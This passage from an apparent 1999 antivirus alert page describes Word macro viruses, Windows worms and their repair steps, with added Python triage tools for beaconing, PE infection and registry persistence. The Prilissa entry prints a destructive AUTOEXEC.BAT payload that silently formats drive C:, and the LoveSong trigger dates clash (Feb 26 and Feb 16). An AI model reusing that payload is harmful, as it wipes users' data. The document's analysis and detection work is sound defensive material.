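        lines.append(f"1999-12-25T00:{t // 60:02d}:{t % 60:02d} 10.1.2.4 192.0.2.50:80")
    lines.append("1999-12-25T00:00:05 10.1.2.3 192.0.2.50:80")   # a one-off, ignored
    return "\n".join(lines) + "\n"


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for pair, interval, count in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{pair[0]} -> {pair[1]}: {count} connections every {interval}s")
```

The jitter threshold is the knob that matters in practice: a worm on a dial-up line that must first trigger auto-dial will drift more than one on a LAN, so start loose (0.25) and tighten once the baseline of the network's ordinary keep-alive traffic is known.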

Norton AntiVirus users can protect themselves from this virus by downloading the current virus definitions either through LiveUpdate or from the Download Virus Definition Updates page.




  Verlor Virus
December 6, 1999

Detected as:
W97M.Overlord
Aliases:
W97M.Verlor, Overlord
Infection Length:
6,233 bytes
Likelihood:
Common
Detected on:
Dec 6, 1999
Region Reported:
Worldwide
Characteristics:
Macro, Stealth




Description
W97M.Overlord is a macro virus that infects Microsoft Word 97 (including SR-1) and Word 2000 documents. It keeps its code in a macro module named Module. The virus has stealth capabilities: when the Visual Basic Editor is opened or Tools | Macro is selected, the virus removes all infectious code from the open documents and from NORMAL.DOT, then re-infects them later.
The virus may also insert these files into your Windows directory: OVERLORD.B.VBS, OVERLORD.B.DLL, TEMPAD.DLL, and TEMPNT.DLL.
OVERLORD.B.DLL, TEMPAD.DLL, and TEMPNT.DLL cannot cause any viral infection. These files should be deleted.
The virus may also add the registry key:
HKLM\software\RegisteredOwner = "the Overlord"
and may modify the WIN.INI, adding the line:
run = <Windows directory>\overlord.b.vbs
This virus has no other payload.
Technical Description
When a document is opened, the virus appends the document's name to the file C:\HIMEM.SYS. This is how it keeps track of documents that have been opened but not yet infected, so that they can be infected later.
When closing documents, the virus infection routine is activated. The virus first checks if the files TEMPAD.DLL or TEMPNT.DLL exist in the Windows directory. These are temporary files created by the virus for its infection routine. If they exist, the files are deleted.
The virus then turns off the macro virus protection feature.
Next, the virus infects the NORMAL.DOT and active documents. In the process, the virus creates the temporary files TEMPAD.DLL and TEMPNT.DLL. These temporary files cannot cause any viral infection.
Finally, the virus checks if the newly infected document filename exists in the file C:\HIMEM.SYS. If the filename exists, the line is removed signifying successful infection.
The virus also contains stealth features. If a user opens the Visual Basic Editor in an attempt to view the macro code, the virus calls a stealth routine. The stealth routine first adds the registry value:
HKLM\Software\RegisteredOwner = "the Overlord"
Then, the virus opens the WIN.INI file and adds the line:
run = <Windows directory>\overlord.b.vbs
Next, the virus inserts the file OVERLORD.B.VBS that contains viral code. The virus also creates a file named OVERLORD.B.DLL. This file is a plain text file and cannot cause any viral infection.
Finally, the actual stealth routine begins. The virus removes all the viral code in any open documents and the NORMAL.DOT, and the Visual Basic Editor is displayed. However, since the virus removed all the virus code, one may be fooled into believing they are not infected.
The VBS file that is inserted into the system then performs a re-infection when the computer is restarted. The VBS file re-infects the NORMAL.DOT and any files, which were left uninfected when opening the Visual Basic Editor. The C:\HIMEM.SYS file is used to determine which files need to be re-infected.
Also, when selecting the Tools | Macro menu, the virus removes all the viral code from the NORMAL.DOT and any open documents. After finishing with the Tools | Macro menu, the virus re-infects the NORMAL.DOT and open documents. This may lead one to believe they are not infected.
Repair Notes
The registry key:
HKLM\Software\RegisteredOwner = "the Overlord"
should be removed or corrected.
The line:
run = <Windows directory>\overlord.b.vbs
should be removed from the WIN.INI file.
The virus turns off the macro virus protection feature of Word97. This can be enabled by selecting Tools | Options | General | Macro Virus Protection.
Any temporary files including OVERLORD.B.DLL, TEMPAD.DLL, and TEMPNT.DLL in the Windows directory may be deleted.
The infectious file OVERLORD.B.VBS should be deleted.




  LoveSong Virus
December 29, 1999

Detected as:
W95.LoveSong.998
Aliases:
W95.Love.998
Infection Length:
998 bytes
Likelihood:
Common
Detected on:
Dec 29, 1999
Trigger Date:
After Feb 26, 2000
Region Reported:
Korea




Description
W95.LoveSong.998 is a memory resident Windows 95/98 virus discovered in Korea.
Once an infected file is executed, the virus will load into memory and will infect files that are accessed. The virus code will be inserted into the .reloc section of the 32-bit executable. If this section of the file is not large enough, it may corrupt the file.
The technique used to hook the file access is based on the method used in the W95.CIH virus. But W95.LoveSong.998 will not split its code like the W95.CIH virus.
The virus has a payload that plays a popular commercial Korean song through the PC speaker. Analysis of the payload routine shows that it triggers after Feb 16, 2000, with the exception of the 30th of each month, when certain criteria are met. The virus contains the text "love" and, because of its payload, was named LoveSong.
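A CIH-style infector that writes its body into the .reloc section leaves two things a triage script can check without a signature: the entry point now points into a relocation (non-code) section, and a .reloc section smaller than the body means the host was damaged, as the description above warns. The following is an added example, not from the alert and not Symantec code: a minimal PE32 header parser plus those two heuristics, run against a constructed two-section image built inline (the layout, section sizes and the 998-byte body length are assumptions). Treat a hit as a reason to look closer rather than as a verdict, since legitimate packers also move the entry point.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_pe(data):
    """Return (AddressOfEntryPoint, [section dicts]) for a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = pe + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(nsections):                                # 40-byte section headers
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("latin-1"),
                         "vsize": f[1], "va": f[2], "rawsize": f[3],
                         "rawptr": f[4], "chars": f[9]})
    return entry, sections


def triage_reloc_infection(data, body_len=998):
    """Heuristics for a .reloc-overwriting infector such as W95.LoveSong.998."""
    entry, sections = parse_pe(data)
    findings = []
    host = next((s for s in sections
                 if s["va"] <= entry < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if host is None:
        findings.append("entry point 0x%x lies outside every section" % entry)
    else:
        if host["name"] == ".reloc":
            findings.append("entry point 0x%x lies inside .reloc" % entry)
        if not host["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append("entry section %s is not marked executable" % host["name"])
    reloc = next((s for s in sections if s["name"] == ".reloc"), None)
    if reloc is not None and reloc["rawsize"] < body_len:
        findings.append(".reloc raw size %d < %d: an overwrite would damage the file"
                        % (reloc["rawsize"], body_len))
    return findings


def build_sample_pe(infected):
    """Constructed minimal PE32 image (assumption: two sections, no imports).
    With infected=True the entry point is moved into .reloc, as the virus does."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)  # i386, 2 sections
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000 if infected else 0x1000)  # entry point
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400,
                       0, 0, 0, 0, 0x60000020)                     # code, exec, read
    reloc = struct.pack("<8sIIIIIIHHI", b".reloc", 0x100, 0x2000, 0x400, 0x600,
                        0, 0, 0, 0, 0x42000040)                    # data, discardable
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + reloc
    image = bytearray(headers.ljust(0x400, b"\0"))
    image += b"\xC3" * 0x200                                       # .text raw data
    image += bytes(0x400)                                          # .reloc raw data
    return bytes(image)


if __name__ == "__main__":
    for label, image in (("clean", build_sample_pe(False)), ("infected", build_sample_pe(True))):
        print(label, triage_reloc_infection(image) or ["no findings"])
```

On a real sample, pass the file's bytes to triage_reloc_infection; the image built by build_sample_pe exists only so the checks can be exercised offline.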




   "Hi 2000" Worm Reported
December 6, 1999

Detected as:
W32.HLLW.Soft6
Aliases:
W32.HLLP.Soft6, W32.Soft6, W32/Soft6.worm, W32.Hi2000
Infection Length:
instals.exe: 306,688 bytes and servicess.exe: 329,728 bytes
Likelihood:
Rare
Trigger Dates:
9am to 12pm on any day
Detected on:
Dec. 6, 1999
Region Reported:
US
Characteristics:
Worm, Y2K




Description
W32.HLLW.Soft6 is a worm that was discovered on Dec. 6, 1999. The worm propagates automatically through the network and displays the message "Hi 2000" between 9am and 12pm. The worm only infects Windows NT systems.



Technical Description
The worm consists of two files named instals.exe and servicess.exe. The worm will only propagate over the network when the worm program (instals.exe) is executed using Administrator or equivalent rights.
When instals.exe is executed, the worm will search for other Windows NT machines and copy both files into the SYSTEM32 directory. The registry on these machines will be modified and set to launch instals.exe every time the machine boots as well as loading servicess.exe as a service.
Once these changes are made, the worm reboots the newly infected machine so that the worm loads. It runs as a service named "service". Between 9am and 12pm the worm continuously displays a "Hi 2000" message on the screen, and the newly infected machine also searches for more Windows NT machines to repeat the propagation. After some time both instals.exe and servicess.exe shrink to zero bytes and the worm no longer functions correctly.
Symptoms of the worm are:
   "Hi 2000" message being displayed on Windows NT machines
   Files named instals.exe and servicess.exe in the SYSTEM32 directory of Windows NT machines
Repair Notes
The worm can be removed manually by following these steps.
Terminate and remove the service named "service" from the Service Manager.
Remove the registry value that refers to instals.exe in:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Delete the files instals.exe and servicess.exe from the SYSTEM32 directory. (If the files are still in use, you may need to reboot first or kill the process using Task Manager/Process View).
Reboot the computer.

Norton AntiVirus users can protect themselves from this worm by downloading the current virus definitions either through LiveUpdate or from the Download Virus Definition Updates page.




  Babylonia Virus

December 17, 1999
A new Trojan horse/virus program, dubbed W95.Babylonia by the virus trackers at the Symantec AntiVirus Research Center, is spreading across the Internet, propagated primarily by users of the popular mIRC Internet Relay Chat program. While the virus is currently more annoying than destructive, it may become more harmful in the future.

How Does It Spread?

W95.Babylonia is so far known to have spread in two ways: via Usenet news and via IRC. According to Symantec, the virus was originally posted to an Internet newsgroup inside a Windows Help file named serialz.hlp, claimed to be a list of serial numbers for "warez" (pirated commercial software). When the help file is opened it exploits a little-known feature of Microsoft Windows that allows help files to contain executable code, so merely opening the help file releases the Trojan horse onto the user's computer and lets it begin its mischief.
Antivirus firm Trend Micro reports that at least one version of W95.Babylonia has been spreading itself, like the Happy99 virus, via an e-mail through an attachment named X-MAS.EXE. (This file can be recognized by name or by the icon it displays: a picture of Father Christmas.)
The primary mode of propagation, however, is IRC, or Internet Relay Chat. W95.Babylonia uses IRC in much the way Melissa and Happy99 use e-mail. If an infected user runs mIRC and joins an IRC channel (chat room), W95.Babylonia broadcasts itself to everyone on the channel as if the user herself had sent it. The accompanying message proclaims the program to be a Y2K bug fix for mIRC.
As with e-mail Trojan horses, the fact that the message seems to have come from a known (and possibly trusted) source may make recipients feel comfortable about running the attached program. But if recipients take the bait and do so, W95.Babylonia infects their machines and propagates itself from them in turn. Once W95.Babylonia has been activated on a computer, it can infect any of the executable files and Windows help files on that machine.
Symantec does not report any incidents in which the infection has spread to shared disks via Microsoft's "Network Neighborhood" feature. However, since this mode of propagation is likely, special precautions should be taken if even one machine on a network with file sharing is infected. The safest procedure is to disconnect the LAN and scan all machines on the network for the infection before reconnecting them.



Will W95.Babylonia Harm My Computer?

So far, it is not clear whether W95.Babylonia contains a malicious "payload" -- that is, it has not been reported to intentionally delete or scribble files on an infected computer. However, it is possible that a "time bomb" hidden in the program could do such things later. Also, any program which modifies executable files has the potential to corrupt them and may also hurt system performance. Most disturbingly, as explained below, the program may be altered remotely at a later date to be more harmful.
The version of W95.Babylonia which is now circulating on the Net causes infected computers to display a message at boot time. The message reads:

W95/Babylonia by Vecna (c) 1999
Greetz to RoadKil and VirusBuster
Big thankz to sok4ever webmaster
Abracos pra galera brazuca!!!
---
Eu boto fogo na Babilonia!
The virus also attempts to send e-mail to the address [email protected].
However, users should not be complacent about these relatively harmless side effects. According to Symantec, W95.Babylonia contains an "interesting" feature: when the program installs itself, some parts of it are downloaded automatically from a Web server in Japan. The virus waits for the computer to connect to the Internet, then downloads these additional components. This "automatic update" capability could be used to add more destructive features to W95.Babylonia when you connect to the Internet at a later date.





   Mypics.Worm Strikes

December 3, 1999
Anti-virus companies are scrambling to fix a potentially malicious worm masquerading as a Y2K glitch that packs a double-punch.
The W32/Mypics.worm comes in an e-mail without a subject line and contains a message that reads "Here's some pictures for you!" At first, the worm acts like Melissa, immediately sending itself to as many as 50 listings in a user's Outlook address book. The mass-mailing will not be triggered if the virus recipient doesn't use Outlook.
But the e-mail also carries an executable attachment, Pics4You.exe, which infects the PC with the worm when it is opened. Once the worm is running, on Jan. 1, 2000 it overwrites part of the hard drive, and if that PC is rebooted any time after the New Year the worm has the potential to completely reformat the hard drive, destroying the data. The damage is designed to look like a Y2K problem.
The worm also changes the home page of Internet Explorer users to a Geocities Web page containing a visitor counter and the words "Dave's Web Page: Brought to You By the Cave!" The site also contains a link to adult content.
5,000 visitors to Dave's Web Page
It's unclear whether the creator of Web page is related to the worm's distribution or creation, according to anti-virus researchers. As of Thursday night, the site had logged more than 3,000 visitors. That number had increased to more than 5,000 Friday morning. Some of those hits may come from people affected by Mypics, but others could be from people who've heard about the worm and are merely curious.
Researchers at Symantec Corp.'s AntiVirus Research Center said they will have new software to combat the worm on their site sometime Friday. Marian Merritt, a group product manager for Symantec's Norton AntiVirus software, said researchers had rated the worm a medium risk.
"We didn't want people to run around and get hysterical," she said. However, she said MyPics could be upgraded to a higher risk category as the company gets more reports of it. Merritt also called MyPics the "scariest" Y2K-related worm or virus she's seen so far.
In recent months, researchers have discovered several other viruses created to take advantage of the date change. Trojan.polyglot was sent out in September, purporting to be a Microsoft Corp. e-mail touting a Y2K fix. If a person installed the virus, it could steal information from their computer. However, there have been few reports of it.
But people have seen worm.fix200, which comes with an e-mail containing the subject line "Internet problem year 2000" and a message in Spanish urging people to update their Y2K software. An attachment in the e-mail could overwrite a user's hard drive.
Still, Carey Nachenberg, Chief Researcher at Symantec's AntiVirus Research Center, said he hasn't seen as many Y2K-inspired viruses and worms as he expected. "There's been very little activity," he said. "People have been very calm."




   MiniZip Virus
December 1, 1999
They call it MiniZip.
Virus researchers at Network Associates Inc. and Symantec Corp. warned Tuesday evening that a new version of the ExploreZip virus, which wipes out information on a hard drive, has hit at least 12 companies so far, six of them high-tech manufacturing companies. Several thousand PCs are believed to have been hit.
The ExploreZip variant, also called ExploreZip.worm.pak, is 120 KB, about half the size of its predecessor. But other than its diminutive size, MiniZip acts exactly like ExploreZip, which both wipes out files on hard drives and can spread via e-mail. For instructions on how to protect your PC against the virus, see our original coverage Inside the Worm.ExploreZip Virus.
Compression conundrum
MiniZip is so small because the virus's author compressed the original ExploreZip code. Compressing it changes the byte patterns that signature-based scanners look for, so scanners that recognized ExploreZip did not recognize the packed copy. MiniZip first appeared last week, and most anti-virus makers have since updated their software to detect it. Although the vendors announced the updates, it appears that many companies had not applied them, allowing Tuesday's outbreak.



What To Look For

ExploreZip, the "father" of MiniZip, was first reported on June 11. The worm uses MAPI-capable e-mail programs to propagate, such as Microsoft Corp.'s Outlook, Outlook Express and Exchange.
It e-mails itself out as an attachment with the filename "zipped_files.exe." The body of the e-mail message looks like it came from a regular e-mail correspondent and says:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs."
Once it is launched, MiniZip runs the original Worm.ExploreZip routine. It looks for any drives mapped to the infected computer and spreads to them, and it looks for unread e-mail and automatically replies to it in search of new victims.
"That's why it has spread so rapidly now, but didn't at first," said Vincent Weafer, director of the Symantec Antivirus Research Center. "This is exactly how ExploreZip spread."
MiniZip may display an error message informing the user that the file is not a valid archive, according to the antivirus companies. The worm copies itself to the c:\windows\system directory with the file name "Explore.exe" and then modifies the WIN.INI file so that the virus launches each time Windows is started.
For the latest bug alerts and anti-virus tools, please check the Help & How-To Bugs Guide.





   Prilissa Virus
November 22, 1999
It's called the W97M/Prilissa virus. But a better name for it would be the Grinch virus.
Anti-virus researchers at Network Associates Inc. said Friday that 10 Fortune 500 companies on three continents have been hit with a new virus called W97M/Prilissa. Prilissa is a nasty variant combining two better-known attacks, the Melissa worm and the PRI virus. The virus depends on the Windows 95 and 98 operating systems and the Word 97 word processing application.
If an infected document is opened, it e-mails itself to the first 50 names in the user's Outlook or Outlook Express address book.
"This is probably the fastest infection rate we've seen since Melissa," said Sal Viveros, antivirus product manager at Network Associates, in Santa Clara, Calif. The virus uses macro commands similar to those of Melissa to replicate itself.
But the virus itself won't go off until Christmas day. That means it won't have much of an impact on companies, which aren't likely to be open on that day, even if it should go undetected. But there is a big threat to home PC users, particularly unsuspecting children logging onto the computer to play with their new games on Christmas.
The Dr. Seuss analogies are endless.

What It Does

The virus itself looks for a registry key to verify if the local system has been infected. If it hasn't, the virus creates a Microsoft Outlook e-mail message with the subject line "Message From (Office 97 user name)" and a message body that says "This document is very Important and you've GOT to read this!!!"
The first 50 listings from all address books are selected, along with an attachment: the infected document, whatever it is.
If the date is December 25, the virus runs a destructive payload that overwrites C:\AUTOEXEC.BAT with the following lines, so that the next boot formats drive C: without any prompt (ctty nul silences the console, /autotest suppresses the confirmation):
@echo off
@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!
ctty nul
format c: /autotest /q /u
The virus will not run on Windows NT. Another message is displayed on Word 97, adding:
"You Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!!"
Most antivirus vendors are expected to have a definition update and fix prepared within the next few hours.
It's unclear who will carve the roast beast.




   FunLove Virus Warning
November 11, 1999
There's nothing tender about the new FunLove virus. The virus, technically called W32.FunLove, brought down the servers of a large company in Europe and has been detected in companies in the U.S., as well, according to researchers at Symantec Corp's AntiVirus Research Center.
The good news is that it shouldn't spread all that fast because it doesn't have the ability to e-mail itself like the Melissa virus, said Charles Renert, director of research at SARC. The bad news is that it uses a new way to attack the file security system of the Windows NT operating system. The virus may also use the network to spread itself.
"It's a little bit of an evolution as far as virus writing is concerned," said Renert.



How It Works

The virus arrives as an executable file and runs on all flavors of Windows from Windows 95 up. The tell-tale sign of infection is the file fclss.exe that the virus drops into the Windows System directory; from there it infects applications with EXE, SCR or OCX extensions.
The real goal of the virus is the Windows NT file security system. To attack it the virus needs administrative rights on an NT server or workstation. Once an administrator logs on, the virus patches the NT kernel so that every user effectively has administrative rights to that machine, regardless of the permissions set on files.
This means that a "guest" -- someone with the lowest possible rights on the system -- would be able to read and modify all files, including files normally accessible only by the administrator.
Symantec officials said they have added virus definitions to recognize FunLove and should have a tool available shortly to help repair an infected machine at www.symantec.com/avcenter/download.html.
Earlier this week, researchers issued warnings about the so-called BubbleBoy virus -- actually a self-replicating worm -- that can spread itself through Microsoft Corp.'s Outlook and Outlook Express software.





  Bubbleboy Worm Alert!
November 9, 1999
Prepare to unlearn everything you've learned about computer viruses.
An anonymous virus writer who is apparently an avid "Seinfeld" fan has created a virus -- actually a self-replicating worm -- that can spread itself through a user's Microsoft Outlook or Outlook Express client.
The worm, called "BubbleBoy" in an apparent reference to a "Seinfeld" episode, is unlike anything that anti-virus software vendors have seen to this point.
It doesn't rely on an attachment. Instead, all a user has to do is open the e-mail: VBScript embedded in the HTML message body runs, reads the Outlook address book and mails the message to everyone in it.
"Historically, anti-virus vendors have always told users, 'If you don't open the attachment, you won't have a problem,' " said Sal Viveros, marketing manager for Total Virus Defense at Network Associates Inc. in Santa Clara, Calif. "This changes that."
For Outlook Express users, it's particularly troubling. Simply using the preview function of Outlook Express will allow the worm to replicate.



New Breed, But Low Risk

Still, BubbleBoy is considered low risk by most anti-virus software vendors, including Network Associates, Symantec Corp., Computer Associates International Inc. and Trend Micro Corp., because it hasn't been reported by any customers.
Besides being a nuisance, it doesn't carry with it any code that could damage someone's computer.
Someone thought to be the virus writer, most likely in an effort to gain attention, sent BubbleBoy to anti-virus companies and posted it on several Web sites Monday night.
Anti-virus vendors worry that this could be a harbinger of some very nasty things to come.
Last month, researchers at the Virus Bulletin conference in Vancouver speculated that something like BubbleBoy could be created.
And just a few days ago, a posting on several security sites explained how it could be done, said Dan Schrader, vice president of new technology at Trend Micro in Cupertino, Calif.
It wouldn't be difficult, Schrader said, for virus writers to release something like BubbleBoy into the wild and attach a malicious payload to the VBS program.
"It's interesting. And it's scary. And it's quite powerful," he said.
But, Schrader added, it isn't in the wild quite yet, and most anti-virus vendors should have it added to their virus definition lists by the end of the day.

Patching For Protection

Who's Affected?
BubbleBoy requires Internet Explorer 5.0 with Windows Scripting Host installed, which is standard on Windows 98 and Windows 2000. It doesn't run on Windows NT or on the default settings of Windows 95. Setting IE 5.0 to its maximum security setting would prevent it from doing anything.
Users won't know they have been infected until the initial e-mail blast. After that, the worm changes the registered owner to BubbleBoy and the organization to "Vandelay Industries."
The body of the message simply says, "The BubbleBoy incident, pictures and sounds."
Vandelay Industries, like the BubbleBoy whose bubble burst during a tense game of Trivial Pursuit, was a long-running joke on "Seinfeld." George, Jerry's often-unemployed sidekick, was fond of saying he worked for the fictitious Vandelay Industries.
The BubbleBoy worm may be taking advantage of a Microsoft security hole for which there is a patch.
Symantec anti-virus researchers in Santa Monica, Calif., are trying to determine if BubbleBoy is taking advantage of an IE 5.0 security flaw discovered in August.
Patch That App
In a security bulletin dated August 31, Microsoft posted a patch that eliminates the security vulnerabilities in two Active X controls of IE 5.0.
The net effect of the vulnerabilities, according to Microsoft, was that a Web page could take control of a user's computer without the user knowing it. Grab the update to patch IE 5.0.
Researchers add that BubbleBoy is further proof that, as anti-virus technology improves, virus writers are getting smarter, particularly when it comes to VBS.
"BubbleBoy in of itself is not very dangerous," said Narender Mangalam, director of security products at Computer Associates in Islandia, N.Y. "The reason we are all very interested in this is because it is a proof of concept."




   Badass Virus Infects Outlook

One of two new e-mail-based worms, Badass, has begun spreading across the Internet. The worm, which originated in the Netherlands, does not damage files, but it creates large volumes of e-mail traffic and could slow networks. Fortunately, Badass' bark is far worse than its bite, and the cure is simple. Virus experts have concluded that the worm, which likely originated in a bank in the Netherlands, is a rather inelegant kludge of the Melissa and Win.Stupid code.
A worm is so named because it burrows into your system and then makes copies of itself, perpetuating its existence. Internet worms are particularly pernicious because they use a host computer to make copies and then take advantage of that computer's Internet connection to send the copies to other computers.

What Badass Looks Like

Like most e-mail-borne worms, Badass arrives as an attachment to an e-mail message and does nothing unless you open the attached file. That is good news: prudent computing dictates that you never open an unknown file, or a file from an unknown sender, and an attachment-based worm cannot execute unless you open the attachment (BubbleBoy, above, is the exception that shows why this rule alone is not enough).
In the case of Badass, the e-mail message, 24,576 bytes in size, has been reported with two subject lines: =?Windows-1252?B?TW9n+2guLg==?= and a variation starting with the characters "Moguh…". The first is the MIME encoded-word form of the second (it decodes to "Mogûh.." in Windows-1252), so mail clients that decode headers show only the plain text. The body of the message reads, in Dutch, "Dit is wel grappig! :-)", which translates to "This is funny! :-)". It is the attachment, BADASS.EXE, that does the damage: when you open it, either by double-clicking the icon in the message or by right-clicking the attachment icon in your e-mail program and selecting Open, the program launches.

What Badass Does

The first thing you'll see is a dialog box with a particularly juvenile and vulgar message, "An error has occurred because your ___ smells bad." The code of the virus is programmed so that you cannot click the No button-a rip-off of Win.Stupid code. When you click yes, you're informed, "Contact your local supermarket for toilet paper and soap to solve this problem."
From here on out it is pure Melissa. The worm looks for Microsoft Outlook; if Outlook is not installed, nothing further happens. If it is, Badass recreates its message, attaches a copy of BADASS.EXE and sends it to everyone in your address book. Badass also adds the registry value HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Windows\CurrentVersion\CMCTL32 = 00 00 00 01 (binary data, under the key Visual Basic programs use for their own settings).
One caveat: it is not known whether Badass is capable of working its pernicious sleight of hand without the aforementioned subject line, message contents and file name. In other words, it is possible that someone could rename the executable and change the message and subject and continue the worm's spread.

Prevention and Cure

Prevention and cure are quite simple. Don't open unknown files, or files from unknown persons. Use virus-scanning software that is capable of checking e-mail attachments, such as McAfee's VirusScan or Symantec's Norton AntiVirus; Norton has released an update to deal with Badass.
If you receive the Badass e-mail, do not just delete the message. Use Windows Explorer to go to the directory where your e-mail program stores attachments and delete the file BADASS.EXE. If you are not sure which directory your e-mail program uses, press F3 in Windows Explorer to open Find and enter BADASS.EXE in the file name box; search all of your hard drives. If the file is not found, your e-mail program deleted the attachment along with the message. After that, empty the Deleted Items folder in your e-mail program and the Recycle Bin on the Windows desktop.
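The alerts on this page keep returning to the same handful of persistence points and markers: Run values (NewApt's tpawen, Hi2000's instals.exe), the WIN.INI run= line (Overlord, MiniZip's Explore.exe) and its registry-mapped form under Windows NT\CurrentVersion\Windows (the INETD.EXE entry), a service (Hi2000's "service"), and infection markers (Overlord's RegisteredOwner, BubbleBoy's "Vandelay Industries", Badass' CMCTL32). The following added example, which is not from any of the alerts or their vendors, turns the manual repair steps of the Hi2000, Overlord and Badass entries into one triage check over exported artifacts: it parses the text of a `reg export` file and of WIN.INI, lists every autostart entry and service image path, tags names the alerts mention, and flags the marker values. The sample export and INI text are constructed, and the key, name and marker lists are drawn from this page only.

```python
import re
from collections import namedtuple
Finding = namedtuple("Finding", "source location detail")

# Autostart locations the alerts on this page name (lower case for comparison).
AUTOSTART_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    # On Windows NT the [windows] run=/load= lines of WIN.INI are mapped to the
    # Run/Load values of this key, which is where the INETD.EXE entry lands.
    r"hkey_current_user\software\microsoft\windows nt\currentversion\windows",
}
SERVICES_PREFIX = "hkey_local_machine\\system\\currentcontrolset\\services\\"
# Dropped files and value names listed in the alerts above.
KNOWN_NAMES = {"inetd.exe", "tpawen", "overlord.b.vbs", "instals.exe",
               "servicess.exe", "fclss.exe", "explore.exe", "irokrun.vbs"}
# Infection markers: value name -> data that means infected (None: any data).
MARKERS = {"registeredowner": {"the overlord", "bubbleboy"},
           "registeredorganization": {"vandelay industries"}, "cmctl32": None}

_KEY = re.compile(r"^\[(.+)\]$")
_VAL = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')

def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")

def _basename(cmd):
    return cmd.split("\\")[-1].split(" ")[0].lower()

def parse_reg_export(text):
    """Yield (key, value_name, data) for every value in `reg export` text."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == ";" or line.startswith(("Windows Registry", "REGEDIT")):
            continue
        m = _KEY.match(line)
        if m:
            key = m.group(1)
            continue
        m = _VAL.match(line)
        if not m or key is None:
            continue
        name = "(Default)" if m.group(1) is None else _unescape(m.group(1))
        rhs = m.group(2)
        if rhs.startswith('"') and rhs.endswith('"'):
            yield key, name, _unescape(rhs[1:-1])                 # REG_SZ
        elif rhs.startswith("hex"):                               # hex:, hex(2): ...
            yield key, name, bytes.fromhex(rhs.split(":", 1)[1].replace(",", ""))
        else:                                                     # dword: and others
            yield key, name, rhs

def parse_win_ini(text):
    """Return (run|load, command) pairs from the [windows] section of WIN.INI."""
    out, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "windows" and "=" in line:
            k, v = (p.strip() for p in line.split("=", 1))
            if k.lower() in ("run", "load") and v:
                out.append((k.lower(), v))
    return out

def triage(reg_text, win_ini_text):
    """List autostart entries, tag names the alerts mention, flag markers."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        k, n = key.lower(), name.lower()
        text = data.decode("latin-1") if isinstance(data, bytes) else data
        known = "KNOWN " if n in KNOWN_NAMES or _basename(text) in KNOWN_NAMES else ""
        if k in AUTOSTART_KEYS and text:
            findings.append(Finding("registry", key, f"{known}{name} = {text}"))
        elif k.startswith(SERVICES_PREFIX) and n == "imagepath":
            findings.append(Finding("service", key, f"{known}ImagePath = {text}"))
        if n in MARKERS and (MARKERS[n] is None or text.lower() in MARKERS[n]):
            findings.append(Finding("marker", key, f"{name} = {text!r}"))
    for kind, cmd in parse_win_ini(win_ini_text):
        known = "KNOWN " if _basename(cmd) in KNOWN_NAMES else ""
        findings.append(Finding("win.ini", "[windows]", f"{known}{kind}={cmd}"))
    return findings

# Constructed sample inputs modelled on the alerts above (not real exports).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"Run"="C:\\WINDOWS\\INETD.EXE"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"tpawen"="C:\\WINDOWS\\SYSTEM\\cooler3.exe"
"SystemTray"="SysTray.Exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\service]
"ImagePath"="C:\\WINNT\\SYSTEM32\\servicess.exe"
[HKEY_LOCAL_MACHINE\Software]
"RegisteredOwner"="the Overlord"
[HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Windows\CurrentVersion]
"CMCTL32"=hex:00,00,00,01
'''
SAMPLE_WIN_INI = "[windows]\nload=\nrun=C:\\WINDOWS\\overlord.b.vbs\n[Desktop]\n"
```

Export the keys before cleaning them so the evidence survives the repair. Real `reg export` output is UTF-16LE with a byte-order mark, so read it with open(path, encoding="utf-16"); long hex: values that Regedit wraps with a trailing backslash are not joined by this parser. Every entry it lists deserves a look, not only the KNOWN ones: the legitimate SystemTray entry in the sample is there to show that the tag is a hint, and a worm renamed as the Badass caveat describes would not carry it.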
